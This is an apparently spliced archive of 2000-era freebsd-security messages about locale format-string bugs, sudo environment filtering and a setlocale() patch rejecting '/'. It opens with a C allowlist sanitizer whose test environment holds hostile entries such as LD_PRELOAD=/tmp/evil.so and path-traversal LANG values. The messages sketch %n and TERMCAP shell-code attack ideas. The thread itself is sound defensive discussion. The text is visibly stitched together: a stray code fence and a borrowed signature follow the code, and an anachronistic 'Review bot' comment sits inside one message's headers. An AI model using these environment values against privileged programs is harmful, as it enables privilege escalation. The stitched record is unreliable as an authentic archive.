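/* Length of the NAME part of a "NAME=value" string. */
static size_t name_len(const char *kv)
{
    const char *eq = strchr(kv, '=');
    return eq != NULL ? (size_t)(eq - kv) : strlen(kv);
}

static bool name_is(const char *kv, const char *name)
{
    size_t n = name_len(kv);
    return n == strlen(name) && strncmp(kv, name, n) == 0;
}

/*
 * Value rules (assumptions of this example) for variables that are allowed
 * but whose value a library could still turn into a file name: a locale or
 * terminal name must not contain '/', mirroring the check the thread
 * describes for LANG in FreeBSD's libc.
 */
static bool value_is_safe(const char *kv)
{
    const char *val = strchr(kv, '=');

    val = val != NULL ? val + 1 : "";
    if (strchr(val, '\n') != NULL)
        return false;                    /* a value must not span lines */
    if (name_is(kv, "LANG") || name_is(kv, "TERM"))
        return strchr(val, '/') == NULL;
    return true;
}

/*
 * Copy the entries of envp that pass both filters into out[], which is
 * NULL-terminated on return and points at the original strings.  Returns
 * the number of entries kept.
 */
int sanitize_env(char *const envp[], const char *out[], int max)
{
    int n = 0;

    for (size_t i = 0; envp[i] != NULL; i++) {
        bool listed = false;

        for (size_t j = 0; allowed[j] != NULL; j++) {
            if (name_is(envp[i], allowed[j])) {
                listed = true;
                break;
            }
        }
        if (listed && value_is_safe(envp[i]) && n < max - 1)
            out[n++] = envp[i];
    }
    out[n] = NULL;
    return n;
}

/* true if a variable called `name` survived sanitizing. */
bool env_has(const char *out[], const char *name)
{
    for (size_t i = 0; out[i] != NULL; i++)
        if (name_is(out[i], name))
            return true;
    return false;
}

int main(void)
{
    /* Constructed caller environment mixing harmless and hostile entries. */
    char *const caller_env[] = {
        "PATH=/usr/bin:/bin",
        "TERM=xterm",
        "LANG=../../../../tmp/evil_locale",   /* a path, not a locale name */
        "PATH_LOCALE=/tmp/evil_locale",
        "NLSPATH=/tmp/evil_nls/%N",
        "TERMCAP=/tmp/evil_termcap",
        "LD_PRELOAD=/tmp/evil.so",
        "HOME=/tmp",
        NULL,
    };
    const char *clean[MAX_ENV];
    int kept = sanitize_env(caller_env, clean, MAX_ENV);

    printf("kept %d variables:\n", kept);
    for (int i = 0; clean[i] != NULL; i++)
        printf("  %s\n", clean[i]);
    return 0;
}
```

The resulting array is what the wrapper would hand to execve(2) as the new environment. Note the direction of the check: a new dangerous variable on some platform needs no change here, whereas Todd's denylist above has to be extended every time one is discovered.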
-- Charles Forsythe

From owner-freebsd-security Thu Sep 7 15:21:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id 1C7B637B422; Thu, 7 Sep 2000 15:21:07 -0700 (PDT)
Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87MKnj06972; Thu, 7 Sep 2000 16:20:49 -0600 (MDT)
Message-Id: <200009072220.e87MKnj06972@xerxes.courtesan.com>
To: Kris Kennaway
Cc: "Todd C. Miller", "Vladimir Mencl, MK, susSED", "Andrey A. Chernov", Warner Losh, freebsd-security@FreeBSD.org, security-officer@FreeBSD.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-reply-to: Your message of "Thu, 07 Sep 2000 15:20:08 PDT."
References:
Date: Thu, 07 Sep 2000 16:20:49 -0600
From: "Todd C. Miller"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message so spake Kris Kennaway (kris):

> IMO, sudo (and all other similar "limited privilege" programs) needs to
> take a positive filtering approach: disallow all variables by default,
> except for those on a defined list of allowed variables for that
> application.

Yes, there's really no other way to win the 'battle' if you will.

 - todd

From owner-freebsd-security Thu Sep 7 15:23:51 2000
Delivered-To: freebsd-security@freebsd.org
Received: from testbed.baileylink.net (testbed.baileylink.net [63.71.213.24]) by hub.freebsd.org (Postfix) with ESMTP id 22ED937B423 for ; Thu, 7 Sep 2000 15:23:48 -0700 (PDT)
Received: by testbed.baileylink.net (Postfix, from userid 1118) id 7EAFD2C90A; Thu, 7 Sep 2000 17:23:44 -0500 (CDT)
Date: Thu, 7 Sep 2000 17:23:43 -0500
From: Brad Guillory To: freebsd-security@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000907172343.F30681@baileylink.net> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <200009072215.e87MFtQ24652@xerxes.courtesan.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from kris@FreeBSD.org on Thu, Sep 07, 2000 at 03:20:08PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The _best_ method would be to convience the OS to run it's own checks on the environment etc just as it would have if it were suid. I can not think of a way to do this. On Thu, Sep 07, 2000 at 03:20:08PM -0700, Kris Kennaway wrote: > On Thu, 7 Sep 2000, Todd C. Miller wrote: > > > Sudo already discards the following: > > This is taking the wrong approach. You can't hope to guess all of the > "magic" environment variables which have special meaning on all platforms > on which sudo may run and implement parallel restrictions in sudo. > > For (a somewhat contrived) example, under Foonix, libc might read a > variable BREAK_TO_EDITOR_ON_EXEC which is ignored when setugid, but which > works otherwise (for "debugging purposes" or whatever). If sudo doesnt > filter this out, then users who can run 'sudo root safecommand' can also > edit any file on the system. > > IMO, sudo (and all other similar "limited privilege" programs) needs to > take a positive filtering approach: disallow all variables by default, > except for those on a defined list of allowed variables for that > application. > > Kris > > -- > In God we Trust -- all others must submit an X.509 certificate. > -- Charles Forsythe > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- __O | Information wants to be free! 
| __O Bike _-\<,_ | FreeBSD:The Power to Serve (easily) | _-\<,_ to (_)/ (_) | OpenBSD:The Power to Serve (securely) | (_)/ (_) Work To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:25: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 4859737B422; Thu, 7 Sep 2000 15:24:55 -0700 (PDT) Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e87MJIg19860; Fri, 8 Sep 2000 02:19:18 +0400 (MSD) (envelope-from ache) Date: Fri, 8 Sep 2000 02:19:17 +0400 
From: "Andrey A. Chernov"
To: "Todd C. Miller"
Cc: Warner Losh, Kris Kennaway, "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
Message-ID: <20000908021915.A19655@nagual.pp.ru>
References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru> <200009072150.e87LoDm26973@xerxes.courtesan.com> <20000908015631.A19316@nagual.pp.ru> <200009072202.e87M2su28507@xerxes.courtesan.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200009072202.e87M2su28507@xerxes.courtesan.com>; from Todd.Miller@courtesan.com on Thu, Sep 07, 2000 at 04:02:54PM -0600
Organization: Biomechanoid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 07, 2000 at 04:02:54PM -0600, Todd C. Miller wrote:
> In message <20000908015631.A19316@nagual.pp.ru>
> so spake "Andrey A. Chernov" (ache):
>
> > Clearing all (or resetting TERMCAP as I suggest) must be done in any case,
> > not only if it begins with '/'. The reason is simple - intruder can supply
> > bad entry (%-infected) directly in the TERMCAP variable.
>
> Sorry, I don't buy it. '%' is a perfectly fine (and common) thing
> to find in a termcap entry. If you have code that behaves poorly
> only on termcap entries with '%' in them you've got serious problems...

You'll buy it. It will be a carefully chosen %p/%s combination with shell
code embedded as \xxx controls directly in the termcap entry and passed to
tgoto/tparm.

--
Andrey A.
Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:26:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7AEC637B423; Thu, 7 Sep 2000 15:26:23 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA24626; Thu, 7 Sep 2000 15:26:23 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 15:26:23 -0700 (PDT) 
From: Kris Kennaway
To: Warner Losh
Cc: "Todd C. Miller", "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <200009072144.PAA06367@harmony.village.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000, Warner Losh wrote:

> In message Kris Kennaway writes:
> : Now, I haven't fully explored to what extent this is possible on FreeBSD -
> : I believe the first one is a problem if sudo is used on third party
> : applications, but I'm not sure if the second one is, i.e. whether we
> : disallow use of '/' in the appropriate locale variables.
>
> We already disallow this. You can't set your lang to be
> ../../../../../../etc/master.password, for example. If the LANG
> variable has / in it, it is ignored. I think that is the only one that
> needs this restriction.

I think all of the following can be pointed to arbitrary files as well in
setlocale():

"LC_ALL", "LC_COLLATE", "LC_CTYPE", "LC_MONETARY", "LC_NUMERIC", "LC_TIME",
"LC_MESSAGES", "LANG"

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:27:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id DE47F37B424; Thu, 7 Sep 2000 15:27:31 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id QAA39531; Thu, 7 Sep 2000 16:27:28 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA07066; Thu, 7 Sep 2000 16:27:18 -0600 (MDT) Message-Id: <200009072227.QAA07066@harmony.village.org> To: Kris Kennaway Subject: Re: UNIX locale format string vulnerability (fwd) Cc: "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org In-reply-to: Your message of "Thu, 07 Sep 2000 15:26:23 PDT." References: Date: Thu, 07 Sep 2000 16:27:18 -0600 
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Kris Kennaway writes: : I think all of the following can be pointed to arbitrary files as well : in setlocale(): : "LANG" LANG cannot. If it contains /, it is ignored. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:32:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B9BF837B423; Thu, 7 Sep 2000 15:32:42 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA25359; Thu, 7 Sep 2000 15:32:42 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 15:32:42 -0700 (PDT) 
From: Kris Kennaway To: Warner Losh Cc: "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009072227.QAA07066@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message Kris Kennaway writes: > : I think all of the following can be pointed to arbitrary files as well > : in setlocale(): > : "LANG" > > LANG cannot. If it contains /, it is ignored. setlocale(), not catopen(). It is treated on the same footing as all of the others, there. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:33:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from sin.core-sdi.com (sin.core-sdi.com [200.49.71.179]) by hub.freebsd.org (Postfix) with ESMTP id B565F37B423 for ; Thu, 7 Sep 2000 15:33:37 -0700 (PDT) Received: from amadeus.servers.core-sdi.com (amadeus.servers.core-sdi.com [192.168.13.3]) by sin.core-sdi.com (Postfix) with ESMTP id 1460A1E04 for ; Thu, 7 Sep 2000 20:09:19 -0300 (ART) Received: (from daemon@localhost) by amadeus.servers.core-sdi.com id BAA14729 for freebsd-security@freebsd.org; Fri, 8 Sep 2000 01:53:05 -0300 
From: Iván Arce
Subject: Re: UNIX locale format string vulnerability (fwd)
Date: 8 Sep 2000 01:53:05 -0300
Organization: CORE SDI S.A.
Lines: 74
Message-ID: <39B81932.F5832679@core-sdi.com>
References: <200009072059.OAA05785@harmony.village.org>
X-Mailer: Mozilla 4.72 [en] (WinNT; I)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Warner Losh wrote:
>
> In message "Vladimir Mencl, MK, susSED" writes:
> : The point is, that if I submitted an evil locale - especially, a locale
> : containing formatting strings with "%n"s, and generally with a lot of
> : weird formatting characters, I could potentially make that sudo-run
> : program execute arbitrary code provided by me - that's what the original
> : bugtraq advisory was about, and what I claim that with sudo can be
> : exploited on FreeBSD too.
>
> Ah. I see your point. This is a generic problem then. However, it
> is a problem with sudo (which is why I keep adding millert back to the
> list of CC'd people). It likely isn't a big problem for reasons I
> explained earlier. sudo isn't intended to be a bulletproof way to give
> users the ability to execute N listed commands, as many of those may
> have sub commands. Todd can take a stand on this more accurately.
>
> : However, the vulnerability is not a buffer overflow, it's only a
> : not-properly-checked format string, and creating an exploit only using
> : "%n"s would be a really ugly hard work, and I would be trying to avoid
> : doing it at any cost....
>
> Hmmmm. Maybe this could be done. The proper fix isn't to fix sudo,
> of course, but rather to ensure that sufficient arguments are present
> to consume the % chars and if not to not do anything.

No, the proper fix is to

1. Ensure that SUID programs don't follow user directives of where to take
   messages with catgets() from. (This is done in the FreeBSD base system)

AND

2. to ensure that unchecked user supplied data is not passed to printf()
   functions as the fmt argument.

If instead of doing printf(catgets("foo")) you do printf("%s",catgets("foo"))
the problem does not appear.

Adding checks to GLIBC (like vendors did) solves the problem but that can not
replace writing secure code in the first place.

The thing is, just the fact that printf() consumes all its arguments does not
guarantee that the program will behave as expected if someone plays with the
format string; in fact changing "%s%s%s" to "%s%n%n" will take the same number
of arguments but the results are quite different. Is it exploitable? Dunno,
depends on the particular program, but one thing is clear, it will not do what
it is expected to do.

-ivan

--
"Understanding. A cerebral secretion that enables one having it to know a
house from a horse by the roof on the house, It's nature and laws have been
exhaustively expounded by Locke, who rode a house, and Kant, who lived in a
horse." - Ambrose Bierce

==================[ CORE Seguridad de la Informacion S.A. ]=========
Iván Arce
Presidente
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A
email : iarce@core-sdi.com
http://www.core-sdi.com
Pte. Juan D. Peron 315 Piso 4 UF 17
1038 Capital Federal
Buenos Aires, Argentina.
Tel/Fax : +(54-11) 4331-5402 Casilla de Correos 877 (1000) Correo Central ===================================================================== --- For a personal reply use iarce@core-sdi.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:34:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 0F10837B422; Thu, 7 Sep 2000 15:34:31 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id QAA39590; Thu, 7 Sep 2000 16:34:27 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA07199; Thu, 7 Sep 2000 16:34:17 -0600 (MDT) Message-Id: <200009072234.QAA07199@harmony.village.org> To: Kris Kennaway Subject: Re: UNIX locale format string vulnerability (fwd) Cc: "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org In-reply-to: Your message of "Thu, 07 Sep 2000 15:32:42 PDT." References: Date: Thu, 07 Sep 2000 16:34:17 -0600 
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Kris Kennaway writes: : On Thu, 7 Sep 2000, Warner Losh wrote: : : > In message Kris Kennaway writes: : > : I think all of the following can be pointed to arbitrary files as well : > : in setlocale(): : > : "LANG" : > : > LANG cannot. If it contains /, it is ignored. : : setlocale(), not catopen(). It is treated on the same footing as all of : the others, there. Ah, it shouldn't :-) Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:37: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 81D9637B422; Thu, 7 Sep 2000 15:36:59 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA25970; Thu, 7 Sep 2000 15:36:59 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 15:36:59 -0700 (PDT) 
From: Kris Kennaway
To: Iván Arce
Cc: freebsd-security@freebsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <39B81932.F5832679@core-sdi.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 8 Sep 2000, Iván Arce wrote:

> No, the proper fix is to
> 1. Ensure that SUID programs don't follow user directives of where
> to take messages with catgets() from. (This is done on
> FreeBSD base system)
>
> AND
>
> 2. to ensure that unchecked user supplied data is not passed
> to printf() functions as the fmt argument.
>
> If instead of doing printf(catgets("foo")) you
> do printf("%s",catgets("foo")) the problem does not appear.

We're actually talking about something different here. It's only
indirectly related to setuid programs and format strings - the real issue
is sudo filtering the environment of the program it runs with privileges
on behalf of the user.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Thu Sep 7 15:42:29 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 874F937B423; Thu, 7 Sep 2000 15:42:26 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA26781; Thu, 7 Sep 2000 15:42:26 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 7 Sep 2000 15:42:26 -0700 (PDT)
From: Kris Kennaway To: Warner Losh Cc: freebsd-security@FreeBSD.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009072234.QAA07199@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message Kris Kennaway writes: > : On Thu, 7 Sep 2000, Warner Losh wrote: > : > : > In message Kris Kennaway writes: > : > : I think all of the following can be pointed to arbitrary files as well > : > : in setlocale(): > : > : "LANG" > : > > : > LANG cannot. If it contains /, it is ignored. > : > : setlocale(), not catopen(). It is treated on the same footing as all of > : the others, there. > > Ah, it shouldn't :-) I didn't spend a lot of time looking at the setlocale() code - could you confirm my interpretation? Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:47:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A5AC937B422; Thu, 7 Sep 2000 15:47:08 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id QAA39652; Thu, 7 Sep 2000 16:47:04 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA07311; Thu, 7 Sep 2000 16:46:55 -0600 (MDT) Message-Id: <200009072246.QAA07311@harmony.village.org> Subject: Re: UNIX locale format string vulnerability (fwd) Cc: Kris Kennaway , "Todd C. 
Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org In-reply-to: Your message of "Thu, 07 Sep 2000 16:34:17 MDT." <200009072234.QAA07199@harmony.village.org> References: <200009072234.QAA07199@harmony.village.org> Date: Thu, 07 Sep 2000 16:46:55 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200009072234.QAA07199@harmony.village.org> Warner Losh writes: : : setlocale(), not catopen(). It is treated on the same footing as all of : : the others, there. : : Ah, it shouldn't :-) Index: setlocale.c =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/lib/libc/locale/setlocale.c,v retrieving revision 1.27 diff -u -r1.27 setlocale.c --- setlocale.c 2000/09/04 03:43:24 1.27 +++ setlocale.c 2000/09/07 22:34:42 
@@ -129,7 +129,7 @@ if (!env || !*env) env = getenv("LANG"); - if (!env || !*env) + if (!env || !*env || strchr(env, '/')) env = "C"; (void) strncpy(new_categories[category], env, ENCODING_LEN); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:47:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A399337B42C; Thu, 7 Sep 2000 15:47:33 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id QAA39666; Thu, 7 Sep 2000 16:47:32 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA07338; Thu, 7 Sep 2000 16:47:22 -0600 (MDT) Message-Id: <200009072247.QAA07338@harmony.village.org> To: Kris Kennaway Subject: Re: UNIX locale format string vulnerability (fwd) Cc: freebsd-security@FreeBSD.org In-reply-to: Your message of "Thu, 07 Sep 2000 15:42:26 PDT." References: Date: Thu, 07 Sep 2000 16:47:22 -0600 
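Review bot: the new strchr(env, '/') test on the '+' line sits after the getenv("LANG") fallback, so a slash is rejected whether env came from the per-category variable or from LANG, which is the right scope for the locale-name-as-path problem under discussion; a one-line comment there saying that a '/' would let the locale name be used as a relative path (the ../../../../../../etc/master.password case raised earlier in the thread) would keep a later reader from "simplifying" the condition away. The silent fall-through to "C" is consistent with the existing empty-value handling in the same condition. Since strchr is now used in this file, confirm setlocale.c includes <string.h>, which the hunk context does not show.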
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Kris Kennaway writes: : I didn't spend a lot of time looking at the setlocale() code - could you : confirm my interpretation? You are right, but it is a bug, which I just sent a patch for. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 16: 5:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id A385D37B422; Thu, 7 Sep 2000 16:05:08 -0700 (PDT) Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e87N4vS20186; Fri, 8 Sep 2000 03:04:57 +0400 (MSD) (envelope-from ache) Date: Fri, 8 Sep 2000 03:03:15 +0400 
From: "Andrey A. Chernov" To: Warner Losh Cc: Kris Kennaway , "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG, millert@openbsd.org Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000908030313.A20166@nagual.pp.ru> References: <200009072234.QAA07199@harmony.village.org> <200009072234.QAA07199@harmony.village.org> <200009072246.QAA07311@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200009072246.QAA07311@harmony.village.org>; from imp@village.org on Thu, Sep 07, 2000 at 04:46:55PM -0600 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 07, 2000 at 04:46:55PM -0600, Warner Losh wrote: > if (!env || !*env) > env = getenv("LANG"); > > - if (!env || !*env) > + if (!env || !*env || strchr(env, '/')) > env = "C"; Ok'ed from me. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 19:28: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f159.pav1.hotmail.com [64.4.31.159]) by hub.freebsd.org (Postfix) with ESMTP id 6126337B424; Thu, 7 Sep 2000 19:27:58 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 7 Sep 2000 19:27:57 -0700 Received: from 165.247.24.83 by pv1fd.pav1.hotmail.msn.com with HTTP; Fri, 08 Sep 2000 02:27:57 GMT X-Originating-IP: [165.247.24.83] 
From: "John Doh!"
To: security@freebsd.org, hackers@freebsd.org
Subject: How to stop problems from printf
Date: Thu, 07 Sep 2000 18:27:57 AKDT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID:
X-OriginalArrivalTime: 08 Sep 2000 02:27:57.0802 (UTC) FILETIME=[66B194A0:01C0193C]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello to you, I am a C coder who wishes to write programs we cannot exploit
via code such as below.

> #include <stdio.h>      /* printf */
> #include <stdlib.h>     /* exit */
> #include <libintl.h>    /* gettext */
>
> int
> main(int argc, char **argv)
> {
>         if(argc > 1) {
>                 /* The translated message is used directly as the format
>                  * string, so whatever the catalog returns drives printf(). */
>                 printf(gettext("usage: %s filename\n"),argv[0]);
>                 exit(0);
>         }
>         printf("normal execution proceeds...\n");
>         return 0;
> }

The issue is that I must be getting the format string from an "untrusted"
place, but want to limit substitution of %... to the substitution of, say in
the example, argv[0], and not do the others, so that, say, given
"usage: %s filename %p" the %p is not interpreted but printed literally
instead, so we get output of (taking argv[0] to be "test" just for example):

usage: test filename %p

Any hints you have I am very grateful for.

From owner-freebsd-security Thu Sep 7 19:33:20 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 8DACE37B424; Thu, 7 Sep 2000 19:33:14 -0700 (PDT)
Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e882XEv16204; Thu, 7 Sep 2000 19:33:14 -0700 (PDT)
Date: Thu, 7 Sep 2000 19:33:14 -0700
